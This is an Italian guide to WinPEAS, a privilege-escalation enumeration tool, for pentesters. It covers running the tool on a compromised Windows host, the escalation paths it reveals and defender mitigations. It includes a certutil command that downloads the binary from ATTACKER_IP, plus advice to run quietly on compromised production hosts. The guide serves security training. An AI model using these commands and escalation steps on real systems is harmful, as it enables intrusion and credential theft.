Guida Approfondita su WinPEAS
WinPEAS Windows Privilege Escalation Awesome Script è uno script sviluppato come parte del progetto PEASS-ng. È ampiamente utilizzato nei processi di post-exploitation per automatizzare la raccolta di
Guida Approfondita su WinPEAS
Introduzione
WinPEAS (Windows Privilege Escalation Awesome Script) è uno script sviluppato come parte del progetto PEASS-ng. È ampiamente utilizzato nei processi di post-exploitation per automatizzare la raccolta di informazioni su potenziali vulnerabilità e configurazioni errate all'interno di sistemi Windows compromessi. WinPEAS è uno dei tool più completi per l'enumerazione automatica.
Obiettivi del Tool
- Rilevamento di misconfigurazioni di sistema.
- Identificazione di servizi vulnerabili o configurati impropriamente.
- Scoperta di credenziali in chiaro.
- Verifica delle ACL su file e directory sensibili.
- Identificazione di binari eseguibili con privilegi elevati.
Versioni Disponibili
winPEASany.exe: compatibile con tutte le versioni Windows, senza necessità di .NET.
winPEASx64.exe/winPEASx86.exe: versioni specifiche per architetture x64 o x86, spesso con output più dettagliato.
- Versione script (batch, PowerShell): meno utilizzata, ma utile in ambienti con forti restrizioni.
Download del Tool
Puoi scaricare le versioni binarie da GitHub:
https://github.com/carlospolop/PEASS-ng/releases/latestOppure clonare direttamente il repository:
git clone https://github.com/carlospolop/PEASS-ngEsecuzione su Host Compromesso
Trasferimento del binario
certutil -urlcache -split -f http://ATTACKER_IP/winPEASx64.exe winpeas.exeEsecuzione semplice
winpeas.exeEsecuzione con output su file
winpeas.exe > output.txtCosa Enumera WinPEAS
1. Informazioni di Sistema
- Versione Windows, architettura, patch installate
- UAC e token info
2. Utenti e Gruppi
- Utenti loggati
- Membri del gruppo Administrators
- Account con password mai cambiata
3. Servizi
- Servizi con binari scrivibili da utenti non privilegiati
- Servizi che eseguono con privilegi elevati
4. Programmi e Task Pianificati
- Applicazioni installate
- Task pianificati mal configurati
5. Autostart e Persistence
- Chiavi di registro di avvio automatico
- Possibili persistence vectors
6. File e Directory
- Permessi anomali (es.
Everyone:Fsu file sensibili)
- Configurazioni potenzialmente scrivibili
7. Credenziali e Config
- File
.ini,.xml,.configcontenenti credenziali
- Connessioni RDP salvate
8. Named Pipes, DLL Hijacking e altro
- Possibili vulnerabilità sfruttabili per privilege escalation
- Path DLL non sicuri
Esempi di Privilege Escalation Facilitati da WinPEAS
- Servizio configurato per usare un binario scrivibile → sostituzione con payload.
- Task pianificato con ACL permissivi → hijack del task.
- Credenziali trovate in un file
.xml→ login con utente privilegiato.
Best Practice per l'Uso
- Eseguire come utente limitato: risultati realistici.
- Salvare l’output per analisi offline.
- Eseguire in modalità silenziosa su host produttivi compromessi.
Mitigazioni per Defender
- Monitoraggio attivo dell'esecuzione di binari da percorsi temporanei.
- Rimozione o restrizione degli account inutilizzati.
- Revisione periodica dei permessi NTFS su file critici.
Risorse Utili
Conclusione
WinPEAS è uno dei tool più potenti per l'enumerazione in ambienti Windows durante il pentesting. È altamente consigliato includerlo in ogni assessment su host Windows, soprattutto nei casi in cui si abbia accesso limitato e si necessiti di scalare i privilegi in maniera efficiente e documentata.